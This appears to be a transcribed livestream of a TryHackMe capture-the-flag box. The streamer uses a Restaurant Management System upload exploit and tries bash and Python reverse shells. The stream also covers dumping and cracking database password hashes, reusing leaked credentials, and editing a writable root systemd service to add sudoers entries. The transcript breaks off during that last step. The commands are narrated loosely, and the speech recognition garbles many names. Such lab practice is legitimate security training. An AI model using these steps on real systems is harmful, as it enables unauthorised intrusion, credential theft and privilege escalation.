let's go ahead. Let's start with Zeno. Go ahead and do an mmap scan of that guy. He should be started up by now. So first, let's make a directory for him, right? Exit out of here. Exit out of here. Clear him out. Come on over here. Exit out of there. And we'll go ahead and we will clear out here, or exit out of here, since that was the one that I had my other terminal in. And we'll go ahead and do that little number. And cd into desktop try hack me, and we'll make a directory for Zeno. Good. Good things, Kretz. Beautiful day today. cd into Zeno. Do I have a Zeno? No, okay. Let's go ahead and mmap. Tappy tack. Boom, boom. 130.82. Get port 22 up and running. Okay. We did it. We booted it. It says patience. I don't have patience, so rust scan. Just a little patience. He too found port 22. We already probably broke the machine. 12340. 12340 on ports 1010 130 82. Currently doing the junior pen test path on Try Hack Me. We'll do all the beginner paths for doing other labs. Yeah, that is a great path. Junior pen test path is a great path. I thought the old one was easier. Alright, we're breaking this machine now. That's what we're doing. 1010 130.82, right? Yep, 1010 130.82. We broke him. Looks like he's working a little bit harder now. Just the guy, how you doing? You got something for that popcorn? Where's it at? I don't know how I get to my own Twitch stream. There we go. Okay, so TAC SV looks at the version. All right, TAC SC runs default scripts. Let's go ahead and head over to mmap default scripts. As you can see, I've talked about this one before, like right here. So we can look at mmap, and we can run different scripts with mmap, right? So within the default script is things that have worked in the past. So you don't need to be working, man. I don't work. Whatever. Even when I'm at work, I don't work. Okay. So TAC SC is the same exact thing, or the equivalent to TAC script or TAC A, which is an aggressive scan. All right. Now we can look up what the default scripts are, and these are all the default scripts, like right here. It's going to go through and try to run every single one of these. Now, obviously, 9% of these don't matter, right? For like HTTP, we're probably only looking at HTTP stuff. So we could have done just a TAC script and then HTTP star, something like that. But we can see it actually does like vulnerabilities too, like SMB vol and stuff like that. See, OS discovery looks to see if it's SMB security 2. I thought it also looked at the vulnerabilities for it too for SMB. Guess not. But it goes through and runs all these default scripts like right here that are made in the mmap scripting engine. So you'll add just a guy. You'll get one that just works for you. You'll get one that fine works for you. I get one that I do for like these things, like CTS, but I get one that I do for test. The one I do for test is usually much bigger and lasts a lot longer, but it's like EJPT, ECPT, EWPT, crap like that. You got a week to do it, So I run it and I'll leave the computer. I'll get up and I'll leave and I'll just let it just run. Usually dump it out to a file or auto recon. Auto recon's another great one. Another great tool for tests and things like that. You do auto recon. All right. Made by Tiberius. I didn't know that was made by Tiberius. Huh. Thank you, Tiberius. All right. So auto recon's another great tool. I think, is it ran? I thought it was ran in Bash, but I guess it might be ran in Python. But all Recon does is it goes through and it pretty much tries to do, I mean, it dumps everything out into folders. Stuff like that. We can actually run it. I think I have all Recon on here. If I still have it. Yep, as you can see, it dumps out reports. Okay, for different things. A lot of these I probably can't even look at because these are probably a lot of test reports like right here. But you can see it'll dump it out and it'll put like all these different scans and things like that into the reports. And it runs a whole bunch of stuff. So it runs different mmap scans. It runs different vulnerability scans, things like that. It runs NICTO. It runs, I think it runs GoBuster too, doesn't it? Like a small GoBuster or something like that it runs. But it just runs a bunch of stuff, dumps it all out in these nice folders. Let me go ahead and go into CD, into Home Kali Auto Recon. Home Kali Auto Recon. Source. Auto Recon. CD into results. You can see it dumps it out into a folder. So I don't feel comfortable opening up a single one of these. Except for maybe this, like right here. All these 10.2, 3, 4, 5, 6, 7, 8, 9. But I don't feel comfortable opening up any of them because it could be a test. I have no idea. So I should probably just remove all those, huh? There. Let's go ahead and run Auto Recon. Don't remember how to run it though. Was this Auto Recon, then it's the IP address? I haven't ran it in a very long time, Auto Recon. Is it Python 3 or something like that? What is it? How do we run this guy? So Python 3. And I'm just going to go with it's Auto Recon up. Python 3. Autorecon.py. Probably need to find the .py file, huh? Locate autorecon.py. Let's go and try to find this. Alright, cool. Python 3. That guy right there. Let's specify at least one target to scan. We'll specify this guy up here. And now he's going to start scanning him, alright? And you can start to watch what he's doing, stuff like that. So we do UDP scans, mmap full scan. It's going to go through. It's going to be doing GoBuster, a bunch of stuff. So, Fearox Buster, yep, that's a good one. But yeah, I really like, Auto Recon's really good for testing things like that also. Because you can let that run, go do what you want to do for an hour or so. Take a good break, good long break and things like that to come back. While that's also running, something else that I like, you can CD in the results. CD in the IP address that we just did, right? CD into report, is it? Or is it CD into scans? And we'll cat, let's say TCP. So as it's running, you can also look inside of it and see what's actually happening. Things like that too. So full TCP mmap.txt. So we can cat that full TCP mmap.txt. All right. And it's starting to go through. It's going to try to, find everything. Okay. But that is Auto Recon like right there. He's obviously right up here. I'll leave him running because he does take a long time. But we do have this 12340. It says that's TCP wrapped. I'm going to go with it's probably a website. That's all I'm going to go with. So let's just try it. HTTP, whatever, 12340. Resource not found. Requested page cannot be found. But that's definitely not a regular 404 page also. So it did find something. And yeah, it is HTTP. Running CentOS. Okay, so let's go ahead and let's do a GoBuster on him. Let's use 100 threads this time. And the Etsy host might be, but usually if it was going to be added in Etsy host, we'd see something down here. Or this would change up here. And this would just be a jacked up looking site. And we also don't know if it's like xeon.thm, xeon. We don't know what it would actually be. We'd have to actually like The DNS would have to be up. We'd have to do like a dig or something like that. Or start to look into here and see what the heck's actually going on. Yeah, see, it's a different error page than most. So I'm wondering, yeah, it could 100% be Etsy host like right there. I guess we will find out. Or it could just be a jerk and just, you know, that might just be a thing for it. RMS. And that was it, just RMS. We got lucky. I used comment out text on that one. RMS. What is RMS? What are you? Welcome to the Pathfinder Hotel Restaurant Management System. Okay. What is a restaurant management system? Restaurant management system. We don't get any cookies just showing up at the page. I see you know what it is. How'd you know, Justy Guy? Or just because I keep saying it? Restaurant management system. Remote code execution, SQL injection, and these two are Joomla. Restaurant menu manager. Remote code execution. Okay, let's try you then. What do you do? Let's go ahead and make sure there's nothing else behind that RMS also. Okay. Looking at port 80, which obviously we're not looking at that. We're looking at port 1234. I wonder if we have an argument for port. URL, argument 1. Print usage, Python, blah, blah, blah. Okay. Target equals URL plus admin foods execute.php. Okay. We got connection here, CSS, admin / foods execute.php, okay. Refer to there, but that doesn't. We'll try to throw this at it, but I think we're gonna have to mess with it a little bit. So let's go ahead and do a Python 3, probably, right? I mean, who made this? Python, okay. Python for whatever. And we're going to do it for, is it Python 3? Are you lying to me? Sorry, looking like it's broken. All right, Python for whatever. And then we have to put in the argument, right? So we obviously need this like right here. Yeah, I kind of figured. Looks like the script is broken like a little bit. Let's go ahead and check out restaurant management system. Restaurant management system exploit. Exploit DB is literally what you got. Arbitrary file upload. He's got remote code execution. He has arbitrary file upload. Where's this at? Is this also in the admin page? If we get into the admin pages, there's supposed to be a password though. Access denied. Good. Click here to log in first. Admin. Oh, come on now. You're a freaking restaurant management system. You can't be that hardcore, right? Admin password. Alright. I wonder if we can register. Or if you're going to send us an email. Click here to log in your account. Okay, we can register. Order more food, blah, blah. Okay, food zone, my account, contact us, all this other stuff. What do we have here now? Add new food. This looks like a restaurant kind of, or an actual restaurant management system 1.0 is affected by vulnerability, which allows an authenticated attacker to upload arbitrary files, which can, but I wonder what he means by authenticated. I wonder if that's like authenticated, like, you know, there's order more food, show foods, please select a category first. That's 100% the Grand Canyon. That's not food. Well, that's just the desert. I don't think that's Grand Canyon, but that is not food. I've been to the desert. It is not food. Plot twist, what was Python 2? Oh, 100% is Python 2. This is right here. This guy like right there. Oh, you know, I might have to actually type in Python 2 now. No, I don't. Okay. I think it's because there's no... I think that's why. I think it's just a messed up ass file. Contact multi-part data form. Just needs to get rid of some spaces. Spaces do matter. We're getting there. Little by little. Little by little, we're getting there. End of line, okay. Print shell uploaded, blah, blah, okay. Where's that at? Print shell uploaded. Okay. Well, that was an annoying ass file, now wasn't it? All right, what do we got here? Looks like it failed. That's what it looks like to me. What's all this crap? We don't need a proxy. Connection refused. You don't say, because we don't need a proxy. I don't think we need any of that. Okay, he's going to RMS admin foods. We can't get there though, now can we? Yeah, let's do that like real quick. Probably just totally jacked this thing up. I am not good with Python, so don't look at me and be like, ha, yes, that's how you do it. I'm not good with any programming language, so definitely do not look at me and, yes, yes. But I know we don't need a damn proxy. We don't need... Why is it still trying to go to a proxy? You have the same issue? Yeah. It's just a messed up ass file. I mean, I'm sure we can figure it out. It's going to take us a minute to figure out, but I'm sure we can figure it out. Hold up. Did I just not put RMS at the end of it? Is that all it was? You know what it looks like he's doing? It looks like he's trying to call back to Burp Suite, doesn't it? It looks like, because 127, 80, 80. It looks like he's trying to call back to Burp Suite. Should we just turn Burp Suite on? What is going on here? I don't know why the hell I'm even in that one. So I think it's trying to call back. It's trying to call back to a proxy for 8080, which is usually how you set up Burp Suite, and it's 127.0.0.1. So it's trying to call back to a proxy against myself, I believe. PHP echo shell get command. Okay. Send a repeater. Send. Has been uploaded. Your information has been added to the directory. Okay. So we got a git command on RMS admin foods. So we got a git command like right here, huh? Or I don't know why I just said get. What the hell am I doing here? Command equals. I don't know why I just said that. We can just change this over here actually. Should change this to command equals ID. We should have seen an ID come back. All right. We do not see an ID come back because we don't have rights for that. Now, do we? Let's try to turn that off. Let's do ID again. Damn. What was it? It was foods.php question mark command equals ID. Okay. Nothing yet, huh? But we will get it. We will get there. So we got the shell, right? Now we just need to figure out where the hell to go for it. Where did it upload the shell to? Images reverse shell. Okay. Okay. Let's go! Okay, yeah, so if for some reason it wants us to have Burp Suite up and have a local repeat everything like that, so let's see if we have to put it into... Okay, so we don't. So we don't have to do anything special with that. All right, Control U. If you're going to do Etsy Pass or stuff like that, then you can see it in a nice format. All right, so let's go ahead and do I guess, which Python or which netcat, I guess? Does it have netcat on here? No, it doesn't. Which bash? It does have bash. Which Python? Do have Python, okay. Python 3? We do have Python 3, okay. So we got bash. So we may be able to just do a quick bash reverse shell and get something from that, right? I mean, we could try. Bash reverse shells is usually don't seem to like to work in try hack me. Scripts, bash reverse shell. All right, we'll throw you at you there, big guy. We'll see what happens. 10.13.26.184. Netcat, LVMP, we'll just do 999, whatever. Let's go ahead and throw this guy at him. Let's see if we get a reverse shell here. Command equals. He is not hanging. Well, yeah, he's not going to hang because there's nobody listening for him. So 100% makes sense. And he does not get it. Okay. So I'm wondering if we have to make it to where dev TCP 10.13.26.184 port 999. That is our IP address still right. We didn't change IP address or anything like that, right? I have config 10.13.26.184. Okay. Yep. Let's go ahead and look up a. You can still look up other stuff, right? Who am I? Okay, so everything still works. All right. Bash TCP. I'm going to try to throw this guy at him. See if he has a better success than the other one. 10.13.26.184.9999. Nope. No better success. Okay. That's what I see. Well, we do have Python here, though. Along with Python 3. We could try to do something like that. Python. And I don't think we need to URL encode anything because we are able to get these slashes across, everything like that. So we could always try to actually go into CD into /home also. Cat /home, I mean. Oh, we're not seeing anything in there. Probably because I'm not actually looking at anything, huh? ls-tech LA /home. There we go. We have Edward. Might be able to get like a IDRSA key or something like that too. Edward. .sh. Authorized keys. Damn. We could always look up user.text and cat that, I think. Oh, let's look at we have permission for it. So I think that was called, at least was user.text, right? Yep, user.text. Looks like we don't have permission for it though. Okay. Grab that Python one, right? Which we already grabbed. Let's go ahead and throw that in here. See if we can do something with this guy right here. On 10.13.26.184, port 9999, right? 10.13.26.184. He really does not want to make a callback to us, does he? Well, he's not going to make a callback like that also. Hanging. Let's go! Alright, so we got somewhere, right? Let's see what question we're supposed to answer also. Gained access as root user. Can we say completed? And this be like, there, we did it. Alright. So, I had to mess with the script. Well, we didn't really have to mess with the script. We just kind of understand what it was actually doing there. We finally got in. Let's go ahead and CD to /home, I guess. CD to Edward. We still shouldn't be able to cat it. Yeah, we can't. Okay. Let's see here. thinking there's probably something in here like a config.php or something like that, right? Maybe something in admin. Maybe something in login register. Let's try to go into admin first. Accounts.php. Maybe just the MySQL database. Just hop into there. Maybe it's we got a password, like no root or whatever, you know, something like that. Maybe we can do something like that. I think that's not .php. I like this connection one. Config.php. There we go. There's our config.php file. Should be able to find password in here. So root no password for the database login. Okay. MySQL. Well, we want to get a full shell in here first. So let's go ahead and cat scripts full shell. Python. Okay. Then we'll background him. $18,134. Okay. Let's go to a MySQL tech u root. There's no. Okay, well, supposedly wasn't one. Saw another connection I thought over here also. So I made me realize there was two connection ones. So there's one in admin, there's also one non-admin. Config.php. Database user root, and then there's a password. Okay, cool. MySQL, tech u root, tech p. That password. There we go. Show databases. Mariah to say that thing is MySQL with stuff. DBRMS. I'm going to go with that. Use DBRMS. About to find out. Show tables. Seems like it is. Select star from users. Or maybe staff. Okay, select star from staff. Okay, we just get some IDs, street addresses, things like that. Okay. Billing details, cart details, categories, members, maybe. Select star from members. All right, looks like we got a couple things in here. These look a little bit better, don't they? Let's go and grab him. Let's go and grab these passwords. We'll make a quick nano path.txt file. And we'll try to crack these guys like right here because they're most likely going to be hashed. I don't think those are just straight up just the password. I don't know what the answer is over there, but the answer say that I think is a password. Okay, let's go into a John pass.txt word list equals user share word list rocket.txt fork equals 4. We'll try to throw these guys at it. He can't figure out what the hell those are, can he? Let's go ahead and see what the hell these are. Well, these guys are saying MD5. So maybe we should just look at it as a raw MD5. I think it's raw attack MD5. Yeah, format raw attack MD5. Let's go! All right, so we cracked 3 of them. Don't know which one belongs to, though. We should probably do something with it. Let's go ahead and locate that john.pop file. Didn't think we could crack that many of them. Usually I crack 1. Let's go ahead and remove tech-rf, that john.pop file. And then we'll nano pass.text again. And we'll go ahead and we'll throw some usernames, login names in front of it. So it's all emails and everything. Which I don't know if that's really going to help us because we still need like SSH in this guy, right? So I don't know if that's even going to be able to help us. But it should be able to help us, right? If we can SSH at least as, or maybe once we get the his stuff, because this is probably the username, like right here, huh? Yeah, that's his login name. Is just that. Okay. So we'll just go ahead and we'll go back up to the top. Boom. We have J Smith. We have Edward, which that's actually Edward Zeno. That would be the one that we want to get in as, I think. We have test. Okay, so for Omlo Wastefan, we got 1, 2, 3, 4. Test is test, and J Smith is J Smith 1, 2, 3. So we still don't know Edward's password. The one that we want to know, we don't know yet. Let's go ahead and try to. Oh, what our Etsy host show or Etsy shadow show over here? Let's find out. Cat Etsy password. Etsy password show. So we have a Edward. And nobody else. So everyone else is fucking useless to us. Nobody else is on there. So the only person's password I actually want was Edwards. Not on there. Okay. Let's go ahead and exit out here. And remember, when we don't know what else to do, we locate limpies. When we're all out of ideas, we copy over the limpies. Let's go ahead and do a cat. Well, I haven't done like a suit attack. Oh yeah, have I? He's not going to be able to do anything though. That's what I thought. Cat SUID scripts. We gotta get to Edward first. Cron tab? Can we usually mess with the cron tab? GTF opens. Cron tab only works under sudo. Okay. Change? That's nothing. Okay. Let's go and see if he's got any capabilities. No. Alright, yeah, let's go ahead and let's get limpies on this thing. You see how long it's taking just for one box also. This is one machine. So you can just imagine a network. How long this would take. But also how much stuff it's actually getting though also. You know what I'm saying? So let's go ahead and do a CD into desktop. Try hack me Zeno. wget http 10.13.26.184/limpies.sh. Seriously? Well then. Okay, we can't use limpies. But we can't SSH in. How are we going to get limpies on this machine? We also can't SSH because we don't have anyone stuff like that. So how are we going to get that on this machine? Oh, man. Okay, we do have find. And it does work. Is there like a pass.txt anywhere? Share Vim. Scroll up to the top. Usually if we want to find something, it'll be up at the top or anything that was added in or anything like that. Usually be at the top of something. What we got here? Mirror list. Sources. Dependency. Boot. RAM. Python. Hey, thank you very much for the follow, Blitzer36. I know it's very exciting to watch me go through this stuff over here. Shara, how you doing? We are running Zeno like right now. We can't get, there's no wget on here. So we're not able to put linps on it. So I'm kind of just manually enumerating it like right now, and it's pretty miserable. But I'm trying to find like any type of like .text files that have like password, pass, anything like that. I tried pass and password. None of those two worked like right there. We're a very low privilege user. I feel like we got to get into two different users. I feel like we have to get into Zeno and then someone else. We can't do sudo. We have no SUID bits. Then I think about it, I haven't actually looked up the cron tab yet, see if that's running anything. But I feel like if cron tab was running something, I feel like we would have some sort of SUID bit to be able to mess with that, which we do not have any SUID bits. And now we're just kind of just slowly enumerating this box. And I did not see anything in there that could have helped us out at all. So, man. We have to figure out how the hell are we going to transfer limps out of here. Can you transfer a file over bash or anything like that? I don't think you can. Using FTP. Yep, got that. Another way. Okay. That's FTP. That better not be way number 2. This is going to be a bunch of ways. SCP, which we can't use because we don't have a password. Can I use SCP? Can I use SCP? Okay, how the hell am I going to do this? How am I going to get SCP to go from Cali at 10.13.26.184 / home Cali desktop try hack me Zeno limpies.sh to right here. Can I do that? We don't have an SCP connection or an SSH connection. Damn. Redeemed hydrate. All right, give me a minute. I'll get about a drink. Oh God. Here we go. Let's go. All right. Sharma always keeps me in check. Sharma and Frank. Sharma always makes sure I hydrate. Oh man, you want me to chug this thing? I got it. Got it. We'll count that as one of them. Drink another one here in a minute. So I'm trying to, but I don't have SSH connection open, right? So how am I supposed to do this? I don't think we can get it over there. Let's try CD and /temp. Could just look through. We don't have an SSH connection like right now. I was hoping I'd give it back to myself, but obviously not. Let's go. You make that your ringtone. Let's go. Let's see here. How else can we transfer a file? Fuck is rsync? Do we have that on here? No. Do we have that over here? Yes. What do you do? This really ain't going to work. I don't think it's going to be able to transfer over there because we don't have a password. We can't just start transferring files or else everyone in the world will just be transferring files to each other. It'd be like freaking, what is that? It'd be like, Apple and their airdrop crap. You know what I'm saying? Everyone in the world would be dropping stuff to each other. It'd be miserable. Kids would never be able to do anything. It would be the worst. Alright. Let's go ahead and let's get back to cat config.php, right? We have that. Database connected to it. We already got into here. We got the database password. That's not going to work for... No, that's the database password. And then we found that other one also, right? So cd backpack. cd to admin. We found that connection also. That could config. And neither of them are really doing much. The admin one isn't doing anything. We already got the admin. Right? That was an easy day. We need to find what do we have write permissions to. I don't know. You know what I'm saying? We don't have W yet. Nope, no W yet, okay. So how are we supposed to get a file onto the system? How are we supposed to look at anything? This is going to be just totally just manual. That just sounds miserable. That could take years. How is period updated now? Oh. There's the only person to hold the timestamp and the times directory was updated. Okay, thank you very much. Super helpful. Finished scanning everything, that's good. There we go. Okay. So we can look at everything in there. We can also look at stuff in reports, right? Or is that way if we actually output it to that? Yeah, we put stuff in there and everything, but that's how that works. We used to get a libp file. Can you do that, Blitzer? I've never heard of that way of doing it, but we can try it. I've never heard of it doing it that way, but I mean, we can try it. Well, it's obviously got to be, so you're saying dev TCP. I've never seen this used like that before. Let's go ahead and try it again over here. We'll put some quotation marks around it. I don't think that's going to work. That would be absolutely insane if it did. Yeah, no, invalid argument. Found it here, okay. Albeit, let's see here. Let me go ahead and copy that over to my other screen here. If I could open up my own stream, there we go. I'll get there one day. Well, I could just try to curl it, huh? I didn't think about that. Or I could always try to neck cat it. Cat, wow. Okay. This guy have neck cat on him? No, he didn't, did he? Okay, so he's got curl. Let's use curl. Let's CD into user bin. There we go. Get it somewhere. Let's go! We're going to curl over that, right? Obviously not going to look the exact same as that. We're going to do 10, 13, 26, 184. And we can see, there we go. Thank you, Blitzer. Thank you, Blitzer, with the freaking win. The true savior of Zeno. That's probably why I said you have to have patience. I don't know why I didn't think of curl in the first place. Probably, I don't really use it that much. That's probably why I didn't really think of it, but still. That's the F stab. Username Zeno, password. Yes. Password Frob job. I guess this is that job. Obviously. Let's go and SSH in as Zeno at 10.10.130.82 and try to put in that password. Yep, that one like right there. Okay, we obviously have, there's something in here, and that's the F stab. So let's go ahead and check that out. Oh, you have write permissions over Etsy system D system non-zero Zeno monitoring service. Maybe that's what this F stab thing is like right here, huh? So let's go ahead and get in that F stab like real quick. Etsy F stab. Oh. Mount secret share. So is it a mount or something like that? Is this the actual password? That's not working like right there for me with username Zeno. Zeno, right? Okay, that's the password that supposedly we're getting. Let's go ahead and CD into /mount. Secret share. Then we have this 1010. I don't know what the hell that means like right there because we're getting a password. It's not the right password, but we're getting a password. Username Zeno. But the username is not Zeno. That's impossible. There's no Zeno on here. Cat Etsy password shows us that there's no Zeno on here. The only person that we want was Edward. So is this Edward's password? Let me go ahead and copy this like real quick. And we're just going to do a SSH and do Edward at 10.10.130.82. Zeno's the box. And it was Edward Zeno or whatever, right? Let's go! All right, there we go. Okay. Let's go ahead and nano user pass.text. And we'll get Edward. And then that. And that was all thanks to Blitzer. Thank you very much. You see we got the let's go down. All right, so let's go ahead and cat that user.text now. There, we got one thing so far. And then we can go ahead and grab that password again. We'll do a sudo tac out. Let's go ahead and grab that password. Sudo tac out. Whoops, I don't know why the hell I just did that. Tac out. No password, we can reboot it. Well, that's going to be helpful as fuck, won't it? I know that will be helpful because I know there's stuff that we can do. I've done this a long time ago, though. And I had to wear, because we can mess with that Zeno monitoring service. Remember that? In Etsy? We can mess with that. I mean, most likely you're going to have to reboot this machine to mess with it. So let's go ahead and check out that CD into /Etsy. And it was Zeno monitoring service, right? Cat Zeno monitoring service. Remember we saw that in the little thing? What was it called? What was the exact name of it? It should stick like right out to us because it was like, hey, you can do this. Etsy CD into system DMD /system cat Zeno monitoring service. Can we do that? We can. Okay. So let's see who's running this. Root's running it. Let's go ahead and do a cron cat Etsy cron job. Can we do that? Cron tab. Okay, so it doesn't look like there's any cron job running on it, but that doesn't mean anything to us because we can obviously mess with that. We can restart the system. It must execute start. Oh, execute on start equals root Zeno monitoring.py. Okay, we can't get into there, but that's going to execute, I believe, on startup. So it's probably running as a root cron tab tac e or whatever. One of those, the cron job tac e thing, you know. So let's go ahead and we can mess with this, right? We can write to it, right? So let's do a nano Zeno monitoring system service. Nano's not found. Of course it's not. Why would it be found, right? Vim oh god, I always forget how to. There we go. And we want to execute start. Can we just make like a callback to ourselves? Can we do something like that? Can we do a reverse shell? No, I don't think it's going to actually execute root though. Well, it's going to execute as root, but can we do like a reverse shell maybe? Or maybe change a password? Or add a user? Or can't do a W yet, we know that much. We can curl though. Maybe just put like find as like an SUID bit? Or something like that? Can we do something like that? Like bin bash / bin bash, right? Taxi, right? We're going to run a command with bin bash, right? And we are going to echo, and our name is Edward, right? Edward. And we're going to echo Edward, probably make it so he can run find, or maybe just sudo. All right, we can do something like that, right? All equals Okay. Yeah, I pretty much want to make like that. All equals, is it going to be all? Or do we have to, no, because that's not going to do, yeah, we can do like something like that, right? Just all equals all, like this, right? And then all again. Right? And we can put that into, append that to Etsy pseudo-words. Would that work? Because we're going to append it to Etsy pseudo-words? I think that would work. We'll go ahead and we'll shift or exit, escape, WQ. Oh, what is it? It's going to be I fucking hate Vim. I really do. It's the most difficult thing to use in the world for no apparent reason. It's the most difficult thing to exit out of in the world for no apparent reason. Q, just quit. There. I hate Vim. And we didn't even do anything to it. That's good. That's good. I'm glad we did nothing to it. God damn it, I hate Vim. Can we just do like fucking... Oh, you missed me hating Vim. No. You just missed me. We're working on Vim. That's all. And I hate... Because I don't use Vim at all. So just exiting out of Vim... Because, like, you know, we have Sublime text. You have just Nano. It's a fucking text thing. Everyone's like, oh, it's super powerful. You have Sublime. There you go. And you can save in Sublime. Like, there's no reason for Vim to be next to impossible just to exit out of. Like, there's no reason for it. And if you're really into coding that much, you're not hopping out like Vim. You know, like you have your own, you know. No, I'd rather have Notepad++ than fucking Vim. You know what I'm saying? Like, that's just me. How much would I have Notepad++ than try to use Vim? Can we just delete this? How about that? Can we take this whole thing, make a new one, and then just curl something else back into here? I feel like we should just be able to do that. Just okay. There. There's that. Let's go ahead and do it over here. Go ahead and we're going to do a nano. And this is called Zeno monitoring .service. Throw him in there. We're going to do a exec start equals, and then we're going to throw in pretty much what our sudo file has. So sudo nano slash Etsy pseudo-words. And I'm thinking just literally just append to the bottom of it, this like right here. Except it's going to say Edward. So we're going to do that bin bash command, right? So we're going to do /bin /bash -c, right? That like right there, we're going to echo, right? We're going to echo in Edward. And then we're just going to say Edward equals all. Edward equals that. Do something like that. Edward all Notepad? I don't know. Well, I'd rather have Notepad than Vim, yeah, because I can exit out of it without having to do 40 to 7 different things. Okay, so we'll throw Notepad in there, or we'll throw all in there. We'll do that like right there. What else I'm thinking is let's also go ahead and we're gonna append that to /etc pseudo words. Let's also throw something else in there. Just in case that doesn't work, we'll throw a so we do have Python out here, so we can do a Python reverse shell. We realized that because that's what we did in the web server, right? We threw a Python reverse shell in here, right? Yep, okay. Let's go ahead and do a cat scripts Python reverse shell. Let's try to throw this in there. And we're just going to go to 10.13.26.184. Let's go ahead and also do a which Python over here. And user bin. So just to make sure we go in the proper place, do a /user bin. And we'll start with netcat listener. 4242. And let's go ahead and save him. And we'll make a little Python 3 HTTP server on here. Let's go ahead and curl from 10.13.26.184 /Zeno monitoring service. Let's go ahead and throw him back into there. There we go. Oh, what the fuck? Oh, no, okay, we're good. I think. We're not good at all. What just happened like right there? Zeno monitoring service. Cannot resolve hostname 10.13.26.184. 184. I can't resolve the hostname anymore. We literally just did this, didn't we? Oh, let's just SCP it over then. That's okay, because we have his password now, right? Into Edward. So I'm just going to leave that up like right there because that's going to make my life a lot easier. SCP Edward at the IP address of up here, which is going to be 10.10.130.82. Okay. It's saying that he got it, but they say he couldn't resolve whose name. Can I not overwrite this guy like that? Guys, overwrite him. No, it's going to say test, isn't it? Yep, okay. All right, that's okay. So let's go ahead and echo, or let's go ahead and grab this file. Box died. No, box is up. Box is up and running. Can we just can't delete that file, that's all. So, but we do have the file over here. Let's go ahead and SCP it over. Where am I at like right now? I'm not gonna be able to call it the same thing, am I? Somehow I'm gonna have to echo from this guy over in there. Let's go ahead and just do a. Let's go ahead and just do this. See if we can just echo this whole thing in there. is going to be fucking close to impossible, isn't it? Because echo into Zeno service. This is not going to work, is it? Let's go! Oh, nothing happened. Also, he's going to happen like right there. Uh-oh. SCP is, it's a way to send files over SSH. Thank you very much, Kingsley Moe. Thank you very much for the file. So now how are we going to get this? Uh-oh. This is not good. Thank you, J. Ray Zay, for the file. This is not good at all. We need to get that file back over here. Uh-oh. How am I going to get this guy back over there? That's not going to work either. Crap. Alright. Okay. We can do this. I got an idea. That's not going to work either. Jesus fuck. What would copy command to copy file do? Copy it? We could try to copy. That's not a bad idea. No, because it's going to try to overwrite it. We're not going to be able to overwrite it because we can't do that. See? We're not going to be able to copy anything. Okay, we got unit in there so far. I got an idea. For some reason, it won't let me copy or tab my way through this guy. We got a description in there. So we have a unit and we have a description so far. We're crushing it. We're going to try to put more than one file in there now. More than one word. We're going to append Zeno monitoring service. Alright, it's back where it started. Except for this install down here. Except for this graphic right here. So now, let's just try to just throw this one in there. I think I tried to do too much before. Damn. Let's go! Alright, we're getting it. No, I'm not able to copy it. Negative. But I am slowly getting it back to right where it was before, at least. Okay. Alright, so what we did there, we put everything back in the file. Still using Vim. No, but what I'm trying to do is echo Edward, just be able to run everything on Etsy sudo words. I don't care if he needs a password or not because I have his password, right? The user pass.text, right? I have. Oh, that's over in the wrong thing. That's why. So I have his password here, right? So I don't care if he can't run something or not, right? Let's go into sudo tech L because I have his password. So we can run user sbin reboot. Once it reboots, we should technically. We can't do a sudo copy because he can't run copy or he can't run sudo copy over there. So we wouldn't be able to do that. But technically, what we should be able to do now is restart this thing. We should be able to do a sudo user sbin reboot. And we're 100%, we're going to lose our shell. Okay, reboot. It's rebooting. We're getting there. We are indeed getting there. Oh, man. That was, well, we still don't know if this is even going to work yet. Might have to do something like, put them in like, what is it? Might have to do something like, give them like, sudo or something like that. You know, like, all root, no password sudo or something like that. Might do something like that even. Watch, we just shut it down. We didn't actually reboot it. We just shut it down. It's just done for. Gain access to root as root user. I feel like if we, yeah, I feel like we're about to kind of do that. I mean, we're gonna have the root group. It's gonna take a minute to restart, I think. We should just be able to do a sudo tac or sudo su or something like that. Should be able to do something. Should. Doesn't mean we can. Doesn't mean I did it correctly. I don't know how many different files there are for sudo or whatever else. Just, we should. If we reboot, we're not going to get a new IP now because we have to terminate it. So we can't terminate it because then we're going to open up a whole new instance of it. So we can't do that. Because technically we could terminate it because shit, we already know Edward's password. I mean, we'd bypass 90% of it. He's taking his sweet time, huh? I don't think he's pingable also. I don't think his pockets can be pinged. I don't know why. I mean, it's a Linux machine. You would think it would be able to, but I don't think it could be pinged also. Yeah, there's no ports up and running yet. I'm crazy. I go back to work tomorrow. Not very excited about that. Go back to work tomorrow. Be out in the field Tuesday and Wednesday next week, so I won't be streaming at that time. No internet. Sitting out in the middle of nowhere. Watching helos fly around. Gets really boring after a while. You're just like, wow, look at that, you know. Cool. Calling for air. Probably got to do some type of freaking medical crap or something like that. Probably got to do some combat lifesaver or something training. Probably got to fucking teach it. Damn. This box, it did say it could take like up to like 5 minutes to start up, so since we're sitting here, you know, whenever you're watching the clock, a minute takes an hour. When you're not watching the clock, an hour takes a minute, so we're waiting for it to restart. Like, come on. So bam, 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 bam. For the people that are following now, just so you guys know, my family is gone, so I usually don't stream 87 times a day for 4 hours each time. So just so you guys know, it's usually about 5 times a week at nighttime, my time nighttime, which is around this time, like right now. Right now it's 9:07 here p.m. So usually I start around 8:30. 8:30, something like that. I usually start around and just kind of go from there. Usually till about 10, but I usually do about 5 times a week. Sometimes on Saturday and Sundays, every great once in a while, I'll stream during the daytime, and that's usually just when my son takes a nap or whatever else, if he actually goes down for a nap, or sometimes he likes to appear on the streams. All right, we're back in. Damn. Really thought that was going to work too. All right, that's okay. That's okay. Where's that file again? The file was in where the hell was that file? Who are you? Who? Where were you? Crap, as far as I can go up? Ah, you fucker. Where were you? Where was that file? CD into Etsy mount, right? Was that it? Proceeding to mount? Secret share? No, it's not that. I don't remember where that file is at. Is it in Etsy? I remember how I even found that file. Now I think about it. How did I even find that file? Oh, did I try to SCP it over? No, I did not. Did I? Never actually did that SCP. Where did I find where that file was? Mount secret share. Password, domain, local domain. That was an fstab. No, that was just cat fstab. Where did I find that file at? Where were you at? Etsy system. What was in there? Was it an Etsy system D or something like that? Or system D, Etsy system D. That was its system, right? There it is. Okay. I was even farther up, like I already thought that, wasn't it? Because it said you could mess with stuff in here. And that showed that file, didn't it? Okay. So let's go ahead and, so we just try to Vim it. We're going to echo. Well, echo. So we're just going to put him into bin bash, maybe? Maybe just try something like that, right? So we can try to do a, can't really echo it in there though, can't we? Let's go ahead and try to, let's try to use a Vim. I want to delete all of that first. That didn't work like right there. I don't care if he gets his monitoring.py. Whatever. Bin, oh, thank you. Bin bash right? Taxi echo, and then we can echo into there. Or bin bash taxi should be that echo Edward, right? And then what we're gonna do is we're gonna echo Edward into the. I'm thinking just to have like all root no password, something like that. So if 